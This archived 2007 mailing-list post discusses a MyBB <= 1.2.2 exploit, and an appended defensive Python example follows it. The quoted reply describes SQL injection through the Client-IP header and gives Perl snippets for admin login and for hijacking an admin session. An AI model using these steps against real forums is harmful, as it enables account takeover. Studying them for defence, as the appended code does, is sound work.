[VIM] Milw0rm 3719 (Mybb <= 1.2.2)

str0ke str0ke at milw0rm.com
Thu Apr 12 17:51:58 UTC 2007


It was posted to go along with his paper that went up today.  Guessing
he just wanted to show an example of it in action.

http://www.milw0rm.com/papers/149

/str0ke

On 4/12/07, GM darkfig <gmdarkfig at gmail.com> wrote:
> The guy uses the same vulnerability I found
> (http://acid-root.new.fr/poc/28070403.txt).
> He uses the same method (benchmark(), Client-IP, DELETE from
> prefix_sessions WHERE ip='[SQL]', and a debug mode like me :) ). It's
> just the Perl version. He uses the solution number 1 I described in my
> exploit:
>
> # SOLUTION NUMBER 1
> # mysql> select * from mybb_users\G
> # *************************** 1. row ***************************
> #              uid: 1
> #         username: root
> #         password: 39ac8681f5cf4fcd9c9c09719a618bd3
> #             salt: BFeJBOCF
> #         loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
> #
> # $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
> # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
> #
> # SOLUTION NUMBER 2
> # mysql> select * from mybb_adminsessions\G
> # *************************** 1. row ***************************
> #        sid: 81e267263b9254f3aaf670383bfbfec9
> #        uid: 1
> #   loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
> #         ip: 127.0.0.1
> #   dateline: 1175443967
> # lastactive: 1175444369
> #
> # $xpl->addheader('Client-IP','127.0.0.1');
> # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
> # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
> #
> # I decided to use the solution number 2.
>
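
Added example, not part of either message and not MyBB's code: the quoted text names a `Client-IP` header reaching `DELETE from prefix_sessions WHERE ip='[SQL]'`, and this Python/sqlite3 example shows the two defences for that pattern, accepting the header only when it parses as an IP literal and binding the value as a parameter. The `mybb_sessions` column layout, the function names and the sample addresses are assumptions constructed for illustration.

```python
import ipaddress
import sqlite3


def client_ip(headers, remote_addr):
    """Use the Client-IP header only if it is a bare IP literal."""
    raw = headers.get("Client-IP", "").strip()
    try:
        return str(ipaddress.ip_address(raw))
    except ValueError:
        # Not an address: ignore the header and use the socket peer.
        return str(ipaddress.ip_address(remote_addr))


def unsafe_statement(ip):
    """Pattern from the post: the header value is pasted between quotes."""
    return "DELETE FROM mybb_sessions WHERE ip='" + ip + "'"


def delete_sessions(db, ip):
    """Hardened form: the value is bound as data, never parsed as SQL."""
    cur = db.execute("DELETE FROM mybb_sessions WHERE ip = ?", (ip,))
    return cur.rowcount


def demo():
    db = sqlite3.connect(":memory:")
    # Assumed two-column layout, constructed for this example.
    db.execute("CREATE TABLE mybb_sessions (sid TEXT, ip TEXT)")
    db.executemany("INSERT INTO mybb_sessions VALUES (?, ?)",
                   [("a", "192.0.2.10"), ("b", "198.51.100.4")])
    hostile = {"Client-IP": "192.0.2.10' constructed-non-ip"}  # constructed
    ip = client_ip(hostile, "203.0.113.7")             # header rejected
    bound = delete_sessions(db, hostile["Client-IP"])  # bound verbatim
    good = delete_sessions(
        db, client_ip({"Client-IP": "192.0.2.10"}, "203.0.113.7"))
    left = db.execute("SELECT COUNT(*) FROM mybb_sessions").fetchone()[0]
    return ip, bound, good, left


if __name__ == "__main__":
    print(demo())
```

Either control alone closes the hole; together they also keep malformed header values out of the sessions table.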

